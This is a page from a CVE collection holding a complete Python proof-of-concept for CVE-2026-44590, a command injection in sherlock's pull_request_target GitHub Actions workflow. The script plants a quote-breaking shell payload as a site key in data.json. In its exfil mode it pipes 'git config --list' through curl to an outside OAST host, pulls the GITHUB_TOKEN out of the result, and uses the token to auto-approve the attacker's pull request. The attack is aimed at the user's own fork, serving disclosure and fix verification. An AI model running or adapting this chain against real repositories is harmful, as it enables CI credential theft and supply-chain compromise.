5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
""""""

import argparse
import base64
import json
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
import urllib.error
import urllib.request
from datetime import datetime, timezone

# Static text sent by the "harmless" payload; its presence in the OAST log is
# what the script later searches for to decide whether the callback happened.
HARMLESS_MARKER = "Command Injection confirmed at"
# Matches the checkout-installed extraheader line as it appears in
# `git config --list` output and captures the base64 blob after "basic".
EXFIL_TOKEN_RE = re.compile(
    r"http\.https://github\.com/\.extraheader=AUTHORIZATION:\s*basic\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Upstream repository the fork must descend from (checked against the fork's
# `parent.full_name`).
UPSTREAM = "sherlock-project/sherlock"
# Path, relative to the repository root, of the JSON file the PoC edits.
DATA_JSON_PATH = "sherlock_project/resources/data.json"
# NOTE(review): not referenced anywhere in the visible code - presumably kept
# for documentation or future filtering of workflow runs; confirm before removing.
WORKFLOW_FILE = "validate_modified_targets.yml"

# Parent of the fix commit (6eaec5cc, "Fix command injection vuln", 2026-05-02).
# Resetting the fork's master to this SHA reproduces the pre-fix vulnerable
# workflow. Used by --vulnerable.
VULNERABLE_COMMIT = "271608fb22209ef15a775cce88dd07fd4fa76483"


# -----------------------------------------------------------------------------
# Helpers
# -----------------------------------------------------------------------------

def run(cmd, cwd=None, check=True, capture=True):
    """Execute an argument list with subprocess.run and return the result.

    The command is passed straight to ``subprocess.run`` (no shell is
    involved), always in text mode.

    Args:
        cmd: Argument vector, e.g. ``["git", "status"]``.
        cwd: Working directory for the child, or None for the current one.
        check: When true, a non-zero exit raises CalledProcessError.
        capture: When true, stdout and stderr are captured on the result.

    Returns:
        The ``subprocess.CompletedProcess`` for the finished command.
    """
    options = {
        "cwd": cwd,
        "check": check,
        "capture_output": capture,
        "text": True,
    }
    return subprocess.run(cmd, **options)


def log(msg, level="INFO"):
    """Print `msg` to stdout with a UTC HH:MM:SS timestamp and a level tag.

    Unknown levels fall back to the INFO tag. Output is flushed immediately.
    """
    tags = {"INFO": "[*]", "OK": "[+]", "ERR": "[!]", "STEP": "[>]"}
    tag = tags.get(level, "[*]")
    stamp = datetime.now(timezone.utc).strftime("%H:%M:%S")
    print(f"{stamp} {tag} {msg}", flush=True)


def require_tool(tool):
    """Exit the process with status 1 unless `tool` resolves via shutil.which."""
    if shutil.which(tool):
        return
    log(f"Required tool not found: {tool}", "ERR")
    sys.exit(1)


def gh_api(endpoint, method="GET", fields=None):
    """Call `gh api` for `endpoint` and return the decoded JSON response.

    Args:
        endpoint: API path handed to ``gh api`` (e.g. ``repos/o/r``).
        method: HTTP method passed via ``-X``.
        fields: Optional mapping; each item is sent as ``-f key=value``.

    Returns:
        The parsed JSON value, or None when the command fails, prints
        nothing, or prints something that is not valid JSON. Failures are
        logged rather than raised so polling callers can simply retry.
    """
    cmd = ["gh", "api", endpoint, "-X", method]
    for key, value in (fields or {}).items():
        cmd.extend(["-f", f"{key}={value}"])

    try:
        proc = run(cmd, check=True)
    except subprocess.CalledProcessError as e:
        # stderr is captured by run(), but guard against None defensively.
        log(f"gh api {endpoint} failed: {(e.stderr or '').strip()}", "ERR")
        return None

    output = proc.stdout.strip()
    if not output:
        return None
    try:
        return json.loads(output)
    except json.JSONDecodeError as e:
        # Treat unparseable output like any other failed call instead of
        # letting the exception abort the caller's polling loop.
        log(f"gh api {endpoint} returned non-JSON output: {e}", "ERR")
        return None


# -----------------------------------------------------------------------------
# OAST (interactsh) integration
# -----------------------------------------------------------------------------

def find_interactsh_client():
    """Return the path of interactsh-client, or None if it cannot be found.

    PATH is consulted first; ~/go/bin/interactsh-client is the fallback and
    is only accepted when it is an executable regular file.
    """
    on_path = shutil.which("interactsh-client")
    if on_path:
        return on_path
    fallback = os.path.expanduser("~/go/bin/interactsh-client")
    usable = os.path.isfile(fallback) and os.access(fallback, os.X_OK)
    return fallback if usable else None


def spawn_interactsh():
    """
    Spawn interactsh-client as a subprocess and wait for its OAST hostname.

    Returns (process, oast_url, log_path) on success, or (None, None, None)
    when the binary is missing, cannot be started, or does not print a
    hostname matching ``*.oast.*`` within roughly 20 seconds. On failure the
    child is stopped and the temporary log file is removed.
    """
    binary = find_interactsh_client()
    if not binary:
        log("interactsh-client not found in PATH or ~/go/bin", "ERR")
        log("Install with: go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest", "INFO")
        return None, None, None

    # mkstemp creates the file atomically; mktemp only invents a name, which
    # is race-prone and deprecated. The client reopens the path itself via -o,
    # so our descriptor can be closed right away.
    fd, log_path = tempfile.mkstemp(prefix="poc-oast-", suffix=".log")
    os.close(fd)

    def _discard_log():
        try:
            os.remove(log_path)
        except OSError:
            pass

    try:
        proc = subprocess.Popen(
            [binary, "-v", "-o", log_path],
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT,
            text=True,
            bufsize=1,
        )
    except OSError as e:
        _discard_log()
        log(f"Could not start interactsh-client: {e}", "ERR")
        return None, None, None

    # Read stdout until the OAST URL appears (typically within a few seconds).
    # NOTE(review): readline() blocks, so the deadline is only re-checked
    # between lines; a silent but live child can overrun it.
    oast_url = None
    deadline = time.time() + 20
    url_re = re.compile(r"([a-z0-9]+\.oast\.[a-z]+)")
    while time.time() < deadline:
        line = proc.stdout.readline()
        if not line:
            if proc.poll() is not None:
                # EOF because the child exited: no more output will arrive.
                break
            time.sleep(0.2)
            continue
        m = url_re.search(line)
        if m:
            oast_url = "https://" + m.group(1)
            break

    if not oast_url:
        proc.terminate()
        try:
            proc.wait(timeout=5)
        except subprocess.TimeoutExpired:
            proc.kill()
        _discard_log()
        log("Could not parse OAST URL from interactsh-client output", "ERR")
        return None, None, None

    # NOTE(review): nothing in this function reads proc.stdout after this
    # point; a very chatty child could eventually fill the pipe.
    return proc, oast_url, log_path


def check_oast_callback(log_path, marker, retries=6, delay=5):
    """
    Poll the interactsh log file for `marker`.

    The file is re-read up to `retries` times, sleeping `delay` seconds
    between reads (not after the last one), because a callback can arrive a
    little after the workflow finishes. Returns the full log text of the
    read that contained the marker, or None if the path is unusable or the
    marker never shows up.
    """
    if not (log_path and os.path.isfile(log_path)):
        return None

    remaining = retries
    while remaining > 0:
        with open(log_path, errors="replace") as handle:
            text = handle.read()
        if marker in text:
            return text
        remaining -= 1
        if remaining:
            time.sleep(delay)
    return None


def extract_token_from_log(log_path, retries=6, delay=5):
    """
    Search the interactsh log for the AUTHORIZATION extraheader line and
    return the base64-decoded value of its captured blob.

    The file is re-read up to `retries` times with `delay` seconds between
    reads. Returns the decoded string, or None when the path is unusable,
    the pattern never matches, or the blob cannot be decoded.
    """
    if not (log_path and os.path.isfile(log_path)):
        return None

    for attempt in range(retries):
        with open(log_path, errors="replace") as handle:
            text = handle.read()
        match = EXFIL_TOKEN_RE.search(text)
        if match is None:
            if attempt < retries - 1:
                time.sleep(delay)
            continue
        try:
            raw = base64.b64decode(match.group(1))
            return raw.decode("utf-8", errors="replace")
        except ValueError:
            # binascii.Error is a ValueError subclass, so this covers both.
            return None
    return None


# -----------------------------------------------------------------------------
# Token-based PR approval
# -----------------------------------------------------------------------------

def parse_pr_number(pr_url):
    """Return the integer after ``/pull/`` in `pr_url`, or None if absent.

    A falsy `pr_url` (None or empty string) is treated as "no match".
    """
    found = re.search(r"/pull/(\d+)", pr_url or "")
    if not found:
        return None
    return int(found.group(1))


def approve_pr_with_token(repo, pr_number, token):
    """
    Submit an APPROVE review on pull request `pr_number` of `repo` through
    the GitHub REST API, authenticating with `token`.

    Sends a POST to ``/repos/{repo}/pulls/{pr_number}/reviews`` with a JSON
    body carrying the review event and message. Returns the parsed JSON
    response, or None after logging an HTTP or network error.
    """
    endpoint = f"https://api.github.com/repos/{repo}/pulls/{pr_number}/reviews"
    review = {
        "event": "APPROVE",
        "body": "All checks passed. LGTM!",
    }
    request_headers = {
        "Authorization": f"token {token}",
        "Accept": "application/vnd.github+json",
        "Content-Type": "application/json",
        "User-Agent": "poc-cve-pr-target",
    }
    req = urllib.request.Request(
        endpoint,
        data=json.dumps(review).encode("utf-8"),
        method="POST",
        headers=request_headers,
    )
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            raw = resp.read()
            return json.loads(raw.decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        # HTTPError must be handled before URLError (it is a subclass).
        detail = e.read().decode("utf-8", errors="replace")
        log(f"GitHub API error {e.code}: {detail[:200]}", "ERR")
    except urllib.error.URLError as e:
        log(f"Network error calling GitHub API: {e}", "ERR")
    return None


# -----------------------------------------------------------------------------
# Fork manipulation
# -----------------------------------------------------------------------------

def reset_fork_to_vulnerable(fork_repo, clone_url, commit_sha):
    """
    Hard-reset the fork's master branch to `commit_sha` and force-push it.

    The fork is cloned into a throwaway directory, reset, and pushed with
    --force to origin/master. The directory is removed afterwards whether or
    not a git step fails (failures propagate as CalledProcessError from run).
    """
    scratch = tempfile.mkdtemp(prefix="poc-reset-")
    try:
        # (progress message, git argv, working directory) in execution order.
        steps = (
            (f"Cloning {fork_repo} into temp dir for reset",
             ["git", "clone", clone_url, scratch], None),
            (f"Resetting master to {commit_sha[:8]}",
             ["git", "reset", "--hard", commit_sha], scratch),
            ("Force-pushing to origin/master",
             ["git", "push", "--force", "origin", "master"], scratch),
        )
        for message, argv, where in steps:
            log(message, "INFO")
            run(argv, cwd=where)
        log("Fork master rolled back to vulnerable commit", "OK")
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


# -----------------------------------------------------------------------------
# Payload construction
# -----------------------------------------------------------------------------

def build_payload(mode, oast_url):
    """
    Return the JSON key string used as the injected site name.

    The key is meant to be expanded by the workflow templating inside
        poetry run pytest ... --chunked-sites "<KEY>"
    so it closes the surrounding double quote, runs one command, and then
    reopens a quote with `echo "` to keep the remaining line well-formed.

    `mode` selects the command ("harmless" or "exfil"); any other value
    raises ValueError. `oast_url` is interpolated verbatim as the callback
    base URL.
    """
    if mode not in ("harmless", "exfil"):
        raise ValueError(f"unknown mode: {mode}")

    if mode == "harmless":
        # Single POST carrying the static marker plus a UTC timestamp.
        injected = (
            f'curl -s -X POST -d "{HARMLESS_MARKER} $(date -u +%FT%TZ)" '
            f"{oast_url}/ci-test"
        )
    else:
        # Posts the git config listing, then sleeps so the run stays alive
        # while the script reacts to the callback.
        injected = (
            f"git config --list | curl -s -X POST -d @- {oast_url}/gitconfig; "
            "sleep 180"
        )

    return f'TestSite"; {injected}; echo "'


def inject_payload(repo_dir, payload_key):
    """Add `payload_key` to the repository's data.json as a minimal site entry.

    Args:
        repo_dir: Root of the cloned repository.
        payload_key: Key to insert; must not already exist in the file.

    The file is rewritten with 4-space indentation and sorted keys. The
    process exits with status 1 if the file is missing or the key is already
    present.
    """
    data_path = os.path.join(repo_dir, DATA_JSON_PATH)
    if not os.path.isfile(data_path):
        log(f"data.json not found at {data_path}", "ERR")
        sys.exit(1)

    # JSON files are UTF-8; being explicit avoids mis-decoding (or a
    # UnicodeDecodeError) on platforms whose locale encoding is not UTF-8.
    with open(data_path, encoding="utf-8") as f:
        data = json.load(f)

    if payload_key in data:
        log("Payload key already present in data.json (unexpected)", "ERR")
        sys.exit(1)

    data[payload_key] = {
        "errorType": "status_code",
        "url": "https://example.com/{}",
        "urlMain": "https://example.com/",
        "username_claimed": "test",
    }

    with open(data_path, "w", encoding="utf-8") as f:
        json.dump(data, f, indent=4, sort_keys=True)

    log(f"Injected payload key into {DATA_JSON_PATH}", "OK")


# -----------------------------------------------------------------------------
# Workflow run polling
# -----------------------------------------------------------------------------

def find_workflow_run(repo, branch, since_iso, timeout=180):
    """Poll the Actions API until a matching run appears or `timeout` elapses.

    Queries the five most recent pull_request_target runs for `branch` every
    5 seconds and returns the first one whose `created_at` is not earlier
    than `since_iso` (compared as strings). Returns None on timeout.
    """
    log(f"Polling for workflow run on branch '{branch}' (timeout {timeout}s)", "STEP")
    endpoint = (
        f"repos/{repo}/actions/runs?branch={branch}&event=pull_request_target&per_page=5"
    )
    give_up_at = time.time() + timeout
    while time.time() < give_up_at:
        listing = gh_api(endpoint)
        candidates = (listing or {}).get("workflow_runs") or []
        for candidate in candidates:
            if candidate.get("created_at", "") >= since_iso:
                return candidate
        time.sleep(5)
    return None


def wait_for_run_completion(repo, run_id, timeout=300):
    """Poll run `run_id` until its status is "completed" or `timeout` elapses.

    Each successful poll logs the current status and conclusion. The wait is
    10 seconds after a successful poll and 5 seconds after a failed API
    call. Returns the final run data, or None on timeout.
    """
    log(f"Waiting for run {run_id} to complete", "STEP")
    endpoint = f"repos/{repo}/actions/runs/{run_id}"
    give_up_at = time.time() + timeout
    while time.time() < give_up_at:
        snapshot = gh_api(endpoint)
        if snapshot:
            status = snapshot.get("status")
            conclusion = snapshot.get("conclusion")
            log(f"  status={status} conclusion={conclusion}")
            if status == "completed":
                return snapshot
            pause = 10
        else:
            pause = 5
        time.sleep(pause)
    return None


# -----------------------------------------------------------------------------
# Main flow
# -----------------------------------------------------------------------------

def main():
    """Command-line entry point: run the PoC end to end against a fork.

    Steps, in order: parse arguments; check that `gh` and `git` exist;
    optionally start interactsh-client when no --oast-url is given; verify
    or create the fork; prompt for the manual "enable Actions" step on fresh
    forks; optionally adjust fork settings / roll back / sync; clone the
    fork, inject the payload key into data.json on a new branch, push it and
    open a fork-to-fork PR; poll the resulting workflow run; and finally
    report whether the callback (or credential) was observed.

    Cleanup (remote branch deletion unless --keep-branch, temp clone removal,
    stopping interactsh-client and deleting its log) runs in the `finally`
    block that wraps everything after the clone.
    """
    parser = argparse.ArgumentParser(
        description=(
            "CVE-2026-44590 PoC by Astaruf\n"
            "RCE via pull_request_target Injection -> Supply Chain Compromise in sherlock-project/sherlock GitHub Actions Workflow\n"
            "\n"
            "Full write-up: https://nstsec.com/posts/sherlock-rce-pull-request-target-cve-2026-44590/\n"
            "\n"
            "Prerequisites:\n"
            "  gh auth login\n"
            "  go install github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n"
            "\n"
            "Quick start:\n"
            "  # Verify the upstream fix (expects FIX VERIFIED)\n"
            "  python3 poc.py --fork-owner <your-github-username>\n"
            "\n"
            "  # Reproduce the original vulnerability (expects VULNERABILITY CONFIRMED)\n"
            "  python3 poc.py --fork-owner <your-github-username> --vulnerable\n"
            "\n"
            "  # Full impact: token exfiltration + auto-approve PR\n"
            "  python3 poc.py --fork-owner <your-github-username> --vulnerable --mode exfil"
        ),
        formatter_class=argparse.RawTextHelpFormatter,
        # The epilog is whatever the module docstring contains.
        epilog=__doc__,
    )
    parser.add_argument(
        "--fork-owner", required=True,
        help="GitHub username that owns the fork of sherlock-project/sherlock",
    )
    parser.add_argument(
        "--fork-name", default="sherlock",
        help="Name of the fork repository (default: sherlock)",
    )
    # NOTE(review): the help text says auto-verification is "harmless mode
    # only", but the code below also auto-checks in exfil mode whenever the
    # script spawned interactsh itself - the help string looks outdated.
    parser.add_argument(
        "--oast-url", default=None,
        help="OAST endpoint to receive the callback. If omitted, the script "
             "spawns an interactsh-client subprocess and auto-verifies the "
             "callback at the end (harmless mode only).",
    )
    parser.add_argument(
        "--mode", choices=["harmless", "exfil"], default="harmless",
        help=(
            "Payload type (default: harmless).\n"
            "\n"
            "  harmless\n"
            "      Single curl with a static confirmation string.\n"
            "      No secrets touched.\n"
            "\n"
            "  exfil\n"
            "      Dumps `git config --list` (which contains the GITHUB_TOKEN\n"
            "      base64-encoded by actions/checkout) to the OAST, then\n"
            "      sleeps 180s. The script grabs the token while the workflow\n"
            "      is alive and uses it to auto-approve the malicious PR via\n"
            "      the GitHub API."
        ),
    )
    parser.add_argument(
        "--base-branch", default="master",
        help="PR target branch on the fork (default: master)",
    )
    parser.add_argument(
        "--keep-branch", action="store_true",
        help="Do not delete the PoC branch after completion",
    )
    parser.add_argument(
        "--no-poll", action="store_true",
        help="Skip workflow run polling and exit after PR creation",
    )
    parser.add_argument(
        "--no-sync", action="store_true",
        help="Skip syncing the fork with upstream (useful when testing a pinned commit)",
    )
    parser.add_argument(
        "--vulnerable", action="store_true",
        help=f"Roll back the fork's master to the pre-fix commit ({VULNERABLE_COMMIT[:8]}) "
             "before running the PoC. Implies --no-sync.",
    )
    args = parser.parse_args()

    fork_repo = f"{args.fork_owner}/{args.fork_name}"
    # Epoch seconds make the branch name unique per invocation.
    branch_name = f"poc-cve-pr-target-{int(time.time())}"

    # 0. Prerequisites
    require_tool("gh")
    require_tool("git")

    # If no OAST URL provided, spawn interactsh-client and use its URL
    interactsh_proc = None
    interactsh_log = None
    # auto_check is True only when this script owns the interactsh log and
    # can therefore inspect it for the callback itself.
    auto_check = False
    if not args.oast_url:
        log("No --oast-url provided, spawning interactsh-client", "STEP")
        interactsh_proc, args.oast_url, interactsh_log = spawn_interactsh()
        if not args.oast_url:
            sys.exit(1)
        auto_check = True
        log(f"Interactsh URL: {args.oast_url}", "OK")

    log(f"Target fork:    {fork_repo}", "INFO")
    log(f"Base branch:    {args.base_branch}", "INFO")
    log(f"PoC branch:     {branch_name}", "INFO")
    log(f"Payload mode:   {args.mode}", "INFO")
    log(f"OAST endpoint:  {args.oast_url}", "INFO")

    # NOTE(review): every sys.exit() / exception between here and the `try:`
    # further down bypasses the cleanup `finally`, so a spawned
    # interactsh-client process and its log file are left behind on those paths.

    # 1. Verify (or create) the fork
    log("Verifying fork", "STEP")
    info = gh_api(f"repos/{fork_repo}")
    fork_just_created = False
    if not info:
        log(f"Fork {fork_repo} not found, creating it", "STEP")
        run(["gh", "repo", "fork", UPSTREAM, "--clone=false"], check=True)
        # Forks are created asynchronously; poll until ready
        for _ in range(30):
            time.sleep(2)
            info = gh_api(f"repos/{fork_repo}")
            if info:
                break
        if not info:
            log("Fork creation timed out", "ERR")
            sys.exit(1)
        fork_just_created = True
        log("Fork created", "OK")
    if not info.get("fork"):
        log(f"{fork_repo} exists but is not a fork", "ERR")
        sys.exit(1)
    parent = info.get("parent", {}).get("full_name")
    if parent != UPSTREAM:
        log(f"{fork_repo} is a fork of {parent}, expected {UPSTREAM}", "ERR")
        sys.exit(1)
    log(f"Fork verified (parent: {parent})", "OK")

    # 2. Detect whether Actions are actually runnable on the fork.
    # Forks of repos that already contain workflows have a fork-level UI gate
    # ("Workflows aren't being run on this forked repository") that must be
    # cleared by clicking the banner once. There is no public API for this.
    # Heuristic: if the fork was just created OR has zero historical runs,
    # prompt the user to enable Actions in the browser.
    runs_data = gh_api(f"repos/{fork_repo}/actions/runs?per_page=1")
    total_runs = runs_data.get("total_count", 0) if runs_data else 0
    if fork_just_created or total_runs == 0:
        actions_url = f"https://github.com/{fork_repo}/actions"
        log("=" * 70, "INFO")
        log("MANUAL STEP REQUIRED", "INFO")
        log("=" * 70, "INFO")
        log(f"Open this URL in a browser:  {actions_url}", "INFO")
        log("Click 'I understand my workflows, go ahead and enable them'.", "INFO")
        log("This is required only once per fresh fork (GitHub-imposed).", "INFO")
        log("=" * 70, "INFO")
        try:
            input("Press ENTER once you've enabled Actions on the fork... ")
        except EOFError:
            log("Non-interactive shell, assuming Actions are enabled", "INFO")
        log("Continuing", "OK")

    # In exfil mode, enable "Allow GitHub Actions to create and approve PRs"
    # on the fork. This is OFF by default on forks, but it was enabled on the
    # upstream sherlock-project/sherlock at the time of the original report,
    # which is why GITHUB_TOKEN could approve PRs there. Enabling it on the
    # fork lets the PoC reproduce the full attack chain locally.
    if args.mode == "exfil":
        log("Enabling 'Actions can approve PRs' on fork (mirrors upstream setting)", "STEP")
        # check=False: a failure here is reported but does not stop the run.
        perm_proc = run([
            "gh", "api", "-X", "PUT",
            f"repos/{fork_repo}/actions/permissions/workflow",
            "-f", "default_workflow_permissions=write",
            "-F", "can_approve_pull_request_reviews=true",
        ], check=False)
        if perm_proc.returncode == 0:
            log("Setting enabled", "OK")
        else:
            log(f"Could not enable setting: {perm_proc.stderr.strip()}", "INFO")

    # Optionally roll back the fork to the pre-fix vulnerable commit.
    # --vulnerable implies --no-sync (otherwise the next sync would re-apply
    # the fix and undo the rollback).
    if args.vulnerable:
        log(f"--vulnerable: rolling fork back to commit {VULNERABLE_COMMIT[:8]}", "STEP")
        reset_fork_to_vulnerable(fork_repo, info["clone_url"], VULNERABLE_COMMIT)
        args.no_sync = True

    # Sync fork with upstream so we test the latest (potentially patched) workflow
    if args.no_sync:
        log("Skipping sync with upstream (--no-sync)", "INFO")
    else:
        log("Syncing fork with upstream", "STEP")
        sync_proc = run(
            ["gh", "repo", "sync", fork_repo, "--source", UPSTREAM],
            check=False,
        )
        if sync_proc.returncode == 0:
            log("Fork synced with upstream", "OK")
        else:
            log(f"Sync warning: {sync_proc.stderr.strip()}", "INFO")

    # 2. Clone the fork into a temp directory
    # NOTE(review): the clone runs before the `try:` below, so if it fails
    # `workdir` is not removed by the `finally` block.
    workdir = tempfile.mkdtemp(prefix="sherlock-poc-")
    repo_dir = os.path.join(workdir, args.fork_name)
    log(f"Cloning into {repo_dir}", "STEP")
    clone_url = info["clone_url"]
    run(["git", "clone", "--depth", "1", "--branch", args.base_branch,
         clone_url, repo_dir])
    log("Clone complete", "OK")

    try:
        # 3. Create branch
        log(f"Creating branch '{branch_name}'", "STEP")
        run(["git", "checkout", "-b", branch_name], cwd=repo_dir)

        # 4. Build and inject payload
        payload_key = build_payload(args.mode, args.oast_url.rstrip("/"))
        log(f"Payload key: {payload_key}", "INFO")
        inject_payload(repo_dir, payload_key)

        # 5. Commit and push
        log("Committing", "STEP")
        run(["git", "config", "user.email", "[email protected]"], cwd=repo_dir)
        run(["git", "config", "user.name", "poc"], cwd=repo_dir)
        run(["git", "add", DATA_JSON_PATH], cwd=repo_dir)
        run(["git", "commit", "-m", "Add new site: TestSite"], cwd=repo_dir)

        log("Pushing branch", "STEP")
        run(["git", "push", "-u", "origin", branch_name], cwd=repo_dir)
        log("Branch pushed", "OK")

        # 6. Open PR (fork -> fork)
        log(f"Opening PR {branch_name} -> {args.base_branch} on {fork_repo}", "STEP")
        # Captured just before PR creation; find_workflow_run() uses it to
        # ignore runs created earlier than this PR.
        since_iso = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
        pr_proc = run([
            "gh", "pr", "create",
            "--repo", fork_repo,
            "--base", args.base_branch,
            "--head", branch_name,
            "--title", "Add new site: TestSite",
            "--body", "PoC for pull_request_target command injection. "
                      "See CVE-2026-44590. Safe to close after the workflow runs.",
        ], cwd=repo_dir)
        # The PR URL is taken from the last line of the command's stdout.
        pr_url = pr_proc.stdout.strip().splitlines()[-1]
        log(f"PR opened: {pr_url}", "OK")

        if args.no_poll:
            log("--no-poll set, exiting. Watch your OAST endpoint for callback.", "INFO")
            return

        # 7. Poll for workflow run
        run_data = find_workflow_run(fork_repo, branch_name, since_iso)
        if not run_data:
            log("No workflow run detected within timeout. "
                "Check manually: " + f"https://github.com/{fork_repo}/actions", "ERR")
            return
        log(f"Workflow run found: {run_data['html_url']}", "OK")

        # In exfil + auto_check we need to grab the token WHILE the workflow
        # is still running (the GITHUB_TOKEN expires when the run completes).
        # The payload includes a `sleep 180` to keep the workflow alive long
        # enough for us to extract the token and use it.
        approval_result = None
        decoded_token = None
        if auto_check and args.mode == "exfil":
            pr_number = parse_pr_number(pr_url)
            log("Polling OAST for token while workflow is alive", "STEP")
            poll_deadline = time.time() + 300
            while time.time() < poll_deadline:
                # retries=1/delay=0: a single read per iteration; this loop
                # provides the pacing via the sleep at its end.
                decoded_token = extract_token_from_log(interactsh_log, retries=1, delay=0)
                if decoded_token:
                    # NOTE(review): the credential is written to stdout in
                    # clear text here (and again in the summary below).
                    log(f"Token captured: {decoded_token}", "OK")
                    # Strip "x-access-token:" prefix to get raw ghs_... token
                    raw_token = decoded_token.split(":", 1)[-1]
                    if pr_number:
                        log(f"Approving PR #{pr_number} on {fork_repo} with stolen token", "STEP")
                        approval_result = approve_pr_with_token(fork_repo, pr_number, raw_token)
                        if approval_result:
                            log(f"PR approved by {approval_result.get('user', {}).get('login', '?')}: "
                                f"state={approval_result.get('state')}", "OK")
                            log(f"Review URL: {approval_result.get('html_url')}", "OK")
                    break
                # Check if workflow completed in the meantime
                run_status = gh_api(f"repos/{fork_repo}/actions/runs/{run_data['id']}")
                if run_status and run_status.get("status") == "completed":
                    break
                time.sleep(5)

        # If the exfil attack chain already succeeded, the workflow is just
        # running out its sleep timer. Skip the wait, the attacker doesn't
        # care about the run's final conclusion.
        if approval_result:
            log("Attack chain complete, skipping the rest of the workflow run", "OK")
            log(f"(The runner is still sleeping for ~3 minutes; logs at {run_data['html_url']})", "INFO")
            completed = run_data
        else:
            completed = wait_for_run_completion(fork_repo, run_data["id"])
            if not completed:
                log("Workflow did not complete in time", "ERR")
                return
            log(f"Run completed with conclusion: {completed.get('conclusion')}", "OK")
            log(f"Logs: {completed['html_url']}", "INFO")

        # Final verdict. The first two branches apply when this script owns
        # the interactsh log; the last two only tell the user what to look
        # for on their own OAST endpoint.
        if auto_check and args.mode == "harmless":
            log("Checking interactsh log for OAST callback", "STEP")
            content = check_oast_callback(interactsh_log, HARMLESS_MARKER)
            if content:
                log("=" * 70, "OK")
                log("VULNERABILITY CONFIRMED: callback received from runner", "OK")
                log(f"Marker '{HARMLESS_MARKER}' found in OAST log", "OK")
                log("=" * 70, "OK")
            else:
                log("=" * 70, "INFO")
                log("FIX VERIFIED: no callback received from the runner", "INFO")
                log(f"Marker '{HARMLESS_MARKER}' NOT found in OAST log", "INFO")
                log("This is the expected behavior when the workflow is patched.", "INFO")
                log("=" * 70, "INFO")
        elif auto_check and args.mode == "exfil":
            if decoded_token:
                log("=" * 70, "OK")
                log("VULNERABILITY CONFIRMED: GITHUB_TOKEN exfiltrated", "OK")
                log(f"Decoded credential: {decoded_token}", "OK")
                if approval_result:
                    log(f"PR auto-approved via API: state={approval_result.get('state')}", "OK")
                    log(f"Review by: {approval_result.get('user', {}).get('login', '?')}", "OK")
                    log(f"Review URL: {approval_result.get('html_url')}", "OK")
                else:
                    log("PR approval was not attempted or failed (see errors above).", "INFO")
                log("(Token is short-lived and tied to this workflow run.)", "OK")
                log("=" * 70, "OK")
            else:
                log("=" * 70, "INFO")
                log("FIX VERIFIED: no token exfiltrated from the runner", "INFO")
                log("No 'http.extraheader=AUTHORIZATION: basic ...' found in OAST log", "INFO")
                log("Either the injection was blocked, or persist-credentials: false", "INFO")
                log("kept the token out of the git config (defense in depth).", "INFO")
                log("=" * 70, "INFO")
        elif args.mode == "harmless":
            log("Check the OAST endpoint. You should see a POST /ci-test "
                "with body 'Command Injection confirmed at <ts>'.", "INFO")
        else:
            log("Check the OAST endpoint. You should see a POST /gitconfig "
                "containing 'http.https://github.com/.extraheader=AUTHORIZATION: "
                "basic <base64>'. Decode the base64 to obtain the GITHUB_TOKEN.", "INFO")

    finally:
        # Best-effort cleanup; runs on normal completion, early `return`,
        # and on exceptions raised inside the `try` block.
        if not args.keep_branch:
            log(f"Cleanup: deleting remote branch {branch_name}", "STEP")
            try:
                run(["git", "push", "origin", "--delete", branch_name],
                    cwd=repo_dir, check=False)
            except Exception:
                # Deliberately ignored: the branch may never have been pushed.
                pass
        shutil.rmtree(workdir, ignore_errors=True)
        if interactsh_proc:
            log("Stopping interactsh-client", "STEP")
            interactsh_proc.terminate()
            try:
                interactsh_proc.wait(timeout=5)
            except subprocess.TimeoutExpired:
                # Did not exit after terminate(); force it.
                interactsh_proc.kill()
            if interactsh_log and os.path.isfile(interactsh_log):
                try:
                    os.remove(interactsh_log)
                except OSError:
                    pass
        log("Done", "OK")


# Script entry point: run main() only when executed directly, not on import.
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Ctrl-C: report it and exit with 130, the conventional shell status
        # for termination by SIGINT (128 + signal number 2).
        log("Interrupted", "ERR")
        sys.exit(130)